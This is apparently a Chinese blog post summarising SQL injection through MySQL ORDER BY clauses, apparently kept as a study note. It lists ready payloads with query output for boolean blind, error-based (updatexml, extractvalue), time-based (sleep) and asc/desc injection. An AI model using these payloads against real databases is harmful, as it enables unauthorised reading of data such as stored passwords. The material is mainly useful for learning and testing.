zoukankan      html  css  js  c++  java
  • 小结--order by 注入

    之前已经学过的东西,准备把他们依次总结下,包括之前看的一些文章,一些小的tricks之类的,就先从注入开始吧

    0x01 盲注

    1. 判断1和0

    a. if

    select * from user where user_id=1 order by 1-if(substr(version(),1,1)=5,1,(select 1 union select 2));
    +-------+-----------+---------+
    | user  | password  | user_id |
    +-------+-----------+---------+
    | admin | admintest |       1 |
    +-------+-----------+---------+
    1 row in set (0.00 sec)
    

    b.rand

    mysql> select rand(true);
    +---------------------+
    | rand(true)          |
    +---------------------+
    | 0.40540353712197724 |
    +---------------------+
    1 row in set (0.00 sec)
    
    mysql> select rand(false);
    +---------------------+
    | rand(false)         |
    +---------------------+
    | 0.15522042769493574 |
    +---------------------+
    1 row in set (0.00 sec)
    

    这里可以利用rand(true) rand(false)的值不同,排序注入后面的顺序也不同

    mysql> select * from user order by 1-rand(substr(version(),1,1)=5);
    +-------+-----------+---------+
    | user  | password  | user_id |
    +-------+-----------+---------+
    | test  | testadmin |       2 |
    | admin | admintest |       1 |
    | sp4rk | sp4rktest |       3 |
    +-------+-----------+---------+
    3 rows in set (0.02 sec)
    
    

    c.regexp
    select * from user order by 1-if(1=(select 1 regexp if(1=1,1,0x00)),1,1);

    0x02 报错注入

    select * from user order by 1-updatexml(1,concat(0x5e24,version(),0x5e24),0);
    ERROR 1105 (HY000): XPATH syntax error: '^$5.7.22-0ubuntu18.04.1^$'
    mysql> select * from user order by 1-extractvalue(1,concat(0x5e24,version(),0x5e24));
    ERROR 1105 (HY000): XPATH syntax error: '^$5.7.22-0ubuntu18.04.1^$'
    

    0x03 延时注入

    select * from user order by 1-if(ascii(substr(user(),1,1))=114,sleep(5),0);

    0x04 asc desc处

    1.盲注

    mysql> select user from user order by user,if(substr(version(),1,1)=5,1,(select 1 union select 2)) desc;
    +-------+
    | user  |
    +-------+
    | admin |
    | sp4rk |
    | test  |
    +-------+
    

    报错,延时同上

    0x05 逻辑区别进行排序

    mysql> select user from user order by 1-if(1=1,user,user_id);
    +-------+
    | user  |
    +-------+
    | admin |
    | test  |
    | sp4rk |
    +-------+
    3 rows in set, 3 warnings (0.00 sec)
    
    mysql> select user from user order by 1-if(1=1,user_id,user);
    +-------+
    | user  |
    +-------+
    | sp4rk |
    | test  |
    | admin |
    +-------+
    
    payload:    ,if(1=1,user_id,user);
    ,(case when (1=1) then user_id else user end)
    ,ifnull(null,user_id)
    ,rand(1=1)
    
    

    0x06利用报错判断

    payload:
    if(1=1,1,(select 1 union select 2))  正确
    if(1=2,1,(select 1 union select 2)) 错误
    if(1=1,1,(select 1 from information_schema.tables)) 正确
    if(1=2,1,(select 1 from information_schema.tables)) 错误
    
  • 相关阅读:
    CNN comprehension
    Gradient Descent
    Various Optimization Algorithms For Training Neural Network
    gerrit workflow
    jenkins job配置脚本化
    Jenkins pipeline jobs隐式传参
    make words counter for image with the help of paddlehub model
    make words counter for image with the help of paddlehub model
    git push and gerrit code review
    image similarity
  • 原文地址:https://www.cnblogs.com/spark-xl/p/9080398.html
Copyright © 2011-2022 走看看